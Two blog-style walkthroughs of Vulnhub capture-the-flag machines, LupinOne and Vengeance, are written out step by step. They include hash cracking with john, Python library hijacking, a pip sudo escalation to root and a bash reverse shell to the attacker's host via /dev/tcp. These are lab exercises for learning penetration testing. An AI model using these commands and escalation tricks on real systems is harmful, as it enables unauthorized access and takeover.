Empire: LupinOne Vulnhub Walkthrough

Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put their skills to the test. Enumeration is the key, so, let's get started and figure out how to break things down into manageable pieces.

Pentesting Methodology

Network Scanning

●       netdiscover

●       nmap

Enumeration

●       abusing HTTP

●       fuzzing

Exploitation

●       john

●       ssh

Privilege Escalation

●       linpeas

●       python library hijacking

●       pip

●       root flag

Level: Easy-Medium

Network Scanning

To begin, we must use the netdiscover command to scan the network for the IP address of the victim machine.

To move forward in this process, we are launching Nmap.

 

nmap -sC -sV 192.168.1.2

 

We have, according to the nmap output:

●       on port 22 there is an SSH server.

●       an HTTP service (Apache Server) running on port 80, as well as a /~myfiles page.

 

 

Enumeration

We began the enumeration procedure by inspecting the (/~myfiles) HTTP page. Discovered an Error 404, which seemed suspicious.

http://192.168.1.2/~myfiles/

We looked at the view page source and found comment “you can do it, keep trying”.

As a result, we use fuzzing to gain some additional information from this case. We made use of ffuf and we obtained a directory (secret).

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.2/~FUZZ'

Take a good look at that secret directory and analyses that here author is sharing some information related to SSH private key file related to user “icex64” that we need to fuzz.

To find that secret private ssh key, we again use fuzzing with the help of ffuf once more and found text file (mysecret.txt).

ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.1.2/~secret/.FUZZ' -fc 403 -e .txt,.html

We explore mysecret.txt with a web browser. It appears to be a private ssh key, but it is encoded. We thoroughly examined this key and discovered that it is encoded in base 58.

http://192.168.1.2./~secret/.mysecret.txt

We looked up a base 58 decoder online and were met with browserling. It is the most basic online base-58 decoder for web developers and programmers.

Simply enter your data in the form below, click the Base-58 Decode button, and you'll be presented with a base-58 encoded string. We obtained our ssh-key after decoding it.

Exploitation

Since the author has share some hint related to passphrase for SSH Key, thus we are using ssh2john to obtain the hash value of the ssh-key.

locate ssh2john

/usr/share/john/ssh2john.py sshkey > hash

Now, use john to crack the hash value.

john --wordlist=/usr/share/wordlists/fastrack.txt hash

In a few seconds, Bingo!! We obtained the ssh-key password (P@55w0rd!).

We have all of the requirements for ssh login. Use our icex64 username, ssh-key, and cracked password (P@55w0rd!).

ssh -i sshkey icex64@192.168.1.2

Bang!! We used the icex64 user to connect to ssh. We promptly verified this user's access and discovered that a Python file was running. We promptly examined that file and discovered that it could be exploited using the Python Library Hijacking approach.

sudo -l

cat /home/arsene/heist.py

Privilege Escalation

We've started the process of escalating privileges. To begin with the Python Library Hijacking technique, we must first determine the coordinates of webbrowser.py. That's why we're employing the linpeas script.

We've previously downloaded the Linpeas script from git page. Now we just navigate to that directory and launch a basic Python http server.

python -m SimpleHTTPServer 80

Now we'll switch to the icex64 terminal. We moved the directory to /tmp directory and imported the Linpeas script from Kali Linux using the wget function.

cd /tmp

wget 192.168.1.3/linpeas.sh

Then we granted the script the ALL permissions. Then we ran it right away.

chmod 777 linpeas.sh

./linpeas.sh

We obtained the location of the Python file in a matter of seconds (webbrowser.py).

We can now begin our Python Library Hijacking procedure where an attacker is introduced into a python-enabled environment, you can learn more about this strategy by clicking here.

To operate this python file, we utilised the nano command and edit the script to call /bin/bash code into it.

os.system ("/bin/bash")

After all of this effort, we ran the sudo command in conjunction with the coordinates specified in the permissions check on icex64. To switch the user icex64 to arsene.

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

We got the user arsene and checked this user SUDO permissions and found user has privilege to execute pip binary as root without atuthentication. We have an idea to do pip privilege escalation after evaluating a few more moments.

sudo -l

We used the gtfobin instructions provided here to conduct pip privilege escalation. If the programme is allowed to run as superuser by sudo, it retains its elevated rights and can be used to access the file system, escalate, or keep privileged access.

To conduct pip privilege escalation, we only need to run these three commands.

TF=$(mktemp -d)

echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

sudo pip install $TF

Yippee!! Finally, we have the root; simply use the id command to check. It has been proven that it is root; simply change the directory to root. Congo!! We obtained the root flag.

This is how we'll get at the machine's shell. It was a terrific exercise, and it was a lot of fun to cheer for the winners. To comprehend many scenarios, it is required to try once.

Author: Shubham Sharma is a passionate Cybersecurity Researcher, contact LinkedIn and Twitter.

 

digital world.local: Vengeance Vulnhub Walkthrough

Donavan's VENGEANCE (digitalworld.local: VENGEANCE) is a medium level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced CTF players that want to put their talents to the test in these conditions. So, let's get started and find out how to divide things up into reasonable chunks.

Pentesting Methodology

Network Scanning

●        netdiscover

●        nmap

Enumeration

●        abusing http

●        enum4linux

●        smbclient

Exploitation

●        Cewl

●        john

●        SSH

Privilege Escalation

●        pspy64

●        tftp

●        netcat

●        Root Flag

Level: Medium

Network Scanning

To start, we have to use the netdiscover command to scan the network for the IP address of the target machine.

 

netdiscover

 

In this scenario, the victim's IP address is 192.168.1.180.

 

To move further this process ahead, we are now introducing Nmap. To view all services mentioned, we need to know which ones are open so that we may proceed.

nmap -p- -sV 192.168.1.180

 

This system is running a variety of services, according to the findings of the nmap scan.

 

 

Enumeration

We'll start by attempting to use HTTP. Let's have a look at port 80 and see if anything interesting comes up. Because the Apache Server is listening on port 80, we can quickly verify this in the browser.

We found difficulty with redirection to another site after looking for information on that page. As a result, we decided to take it into account as we progressed in this machine.

Then, we added IP and hostname to the /etc/hosts file. To get a better route at this machine.

cat /etc/hosts

Nothing was found to be trustworthy, therefore we opted to run the enum4linux script as SAMBA at 445 was running.

enum4linux 192.168.1.180

In a couple of seconds, we discovered that there is a smb shared directory available on this machine, along with their directory name.

With the help of script, we discovered two users on this system, sara and qinyi.

Exploitation

Now we must begin our exploitation phase using the information obtained through enumeration. First, we attempt to connect to the smb using smbclient.

smbclient -L 192.168.1.180

We got the identical page that the enum4linux script gave us. As a result, we must examine these directories. There is a user named Sara, as we already know. Now, we'll start with the sarapublic$ directory.

smbclient //192.168.1.180/sarapublic$

We found a lot of information in this directory. We used the get command to download all zip and text file into our system so that we could analyze it one at a time.

●        get eaurouge.txt

●        get eassy.txt

●        get gio.zip

●        get blurb.txt

●        get profile.txt

 

We discovered nothing after opening all of these text files. So we proceed with this along with additional data from the sarapublic$ directory.

We received one more file from that location, which is a zip file. However, it is password protected, so it must be cracked in order to be analysed.

Now an idea occurs to me: we can utilize those text files to create a word list that will be very beneficial for brute forcing. So we launched a Python http server in the directory containing all of those files.

python -m SimpleHTTPServer 80

Cewl, on the other hand, is used to turn those text files into a word list for brute force. We'll start with profile.txt and then go on to additional text files one at a time.

cewl 192.168.1.3/profile.txt -w dict.txt

In this system, we use locate zip2john to determine its exact coordinates.

locate zip2john

We obtained the hash of the gio.zip file using zip2john. We can now utilize our dict.txt to crack.

/usr/sbin/zip2john gio.zip > hash

Because we have a dictionary and a hash value, we can utilize john to crack this hash value. Congratulations!! We obtained the password for the gio.zip file which is nanotechnological.

john --wordlist=dict.txt hash

We now have a password that we successfully cracked using the unzip command and received three files: a txt, a png, and a pptx.

unzip gio.zip

First, we examined the png file and found nothing indicating then, we examined text file, which contains information that appears to be a password phrase. Indicating name_corner_circuit.

cat gio/pass_remainder.txt

After opening ppt, on the first page, we got a name, which we remembered and wrote down. According to the instructions in the pass_remainder.txt file

We obtain notice picture name given in the corner of 3^rd slide. We brought all of these details with us, and we received our password (giovanni_130R_Suzuka).

Privilege Escalation

It's a great opportunity to start the privilege escalation procedure. We have a password (giovanni_130R_Suzuka), and we know that ssh is operating on port 22222. We also received two user names, sara and qinyi.

So, on ssh login, we begin with user qinyi.

ssh qinyi@192.168.1.180 -p 22222

We discovered that an eaurouge file is running using the sudo command, but we can't access it because this user lacks the necessary permissions.

We use the pspy64 tool to learn more about this lab. It is a command-line utility that allows you to spy on processes without requiring root access. It lets you watch commands run by other users, cron jobs, and so on as they run.

We just use the wget command to download the tool from github.

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

We gave it all permissions with the chmod command and ran it straight away.

chmod 777 pspy64

./pspy64

We quickly discovered that something was running on port 69. The sudo command earlier provided us with its exact location (/home/sara/private/eaurouge).

First, we use nmap to determine whether or not port 69 is open. We discovered that it is operating the tftp service.

nmap -sU -p69 192.168.1.180

We connect to the tftp service and download the eaurouge file, which is operating in the lab's background.

tftp 192.168.1.180

get eaurouge

We determined that we could place a reverse shell in the eaurouge file after opening it.

cat eaurouge

Using the nano command, we inserted our reverse shell to this file.

bash -c 'exec bash -i &>/dev/tcp/192.168.1.3/8888 <&1'

Now, connect to the tftp service once more and upload this file to this server.

tftp 192.168.1.180

put eaurouge

Following that, we attempt to run this file from as qinyi' user.

sudo /home/sara/private/eaurouge

We activate the netcat listener on port 8888 after all of this hard work. We accomplished all of the required actions in accordance with the reverse shell.

Yippee!!! We obtained root, moved the directory to root, and obtained our Root Flag.

nc -lvp 8888

cat proof.txt

This lab, I must say, is a pleasant activity with some challenging moves. This lab is appropriate for some experienced CTF players who wish to put their skills to the test in these environments. Donavan, you did an excellent job.

Author: Shubham Sharma is a passionate Cybersecurity Researcher, contact LinkedIn and Twitter.